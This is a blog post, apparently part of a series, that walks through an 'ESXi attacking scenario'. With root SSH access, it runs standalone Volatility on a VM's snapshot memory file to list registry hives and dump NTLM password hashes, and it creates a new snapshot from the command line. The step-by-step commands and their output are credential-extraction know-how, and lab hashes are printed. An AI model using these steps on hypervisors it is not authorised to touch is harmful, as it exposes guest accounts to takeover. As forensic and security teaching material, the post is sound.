Memdumps, Volatility, Mimikatz, VMs – Part 8: ESXi Attacking Scenario – Volatility on ESXi

How cool is that: volatility standalone is running on esxi…
This scenario is only if you have access to the ESXi server via ssh.
Connecting to downloads.volatilityfoundation.org (173.61.222.9:80)
volatility_2.5.linux 100% |*******************************| 32039k  0:00:00 ETA
[root@localhost:/tmp] unzip volatility_2.5.linux.standalone.zip
Archive:  volatility_2.5.linux.standalone.zip
   creating: volatility_2.5.linux.standalone/
  inflating: volatility_2.5.linux.standalone/AUTHORS.txt
  inflating: volatility_2.5.linux.standalone/CREDITS.txt
  inflating: volatility_2.5.linux.standalone/LEGAL.txt
  inflating: volatility_2.5.linux.standalone/LICENSE.txt
  inflating: volatility_2.5.linux.standalone/README.txt
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x64
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x86
Find the .vmem files:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot3.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot2.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem
To the usual stuff:
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f “./Windows 7 x64-Snapshot1.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64]           Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f “./Windows 7 x64-Snapshot1.vmem” –profile=”Win7SP1x64″ hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 hashdump -f “./Windows 7
x64-Snapshot1.vmem” –profile=”Win7SP1x64″ -y 0xfffff8a000024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Create a snapshot
Yes, of course it is possible to create a snapshot on the cli.
[root@localhost:~] vim-cmd vmsvc/snapshot.create 5 “snap” “some comment” 1 0
And again:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem
[root@localhost:/tmp/volatility_2.5.linux.standalone] ./volatility_2.5_linux_x64 -f “/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem” imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002a4b0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002a4cd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-31 14:55:50 UTC+0000
     Image local date and time : 2016-01-31 15:55:50 +0100
and so on.
Links:
Advertisements

One thought on “Memdumps, Volatility, Mimikatz, VMs – Part 8: ESXi Attacking Scenario – Volatility on ESXi

  1. Pingback: Memdumps, Volatility, Mimikatz, VMs – Overview | govolution

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s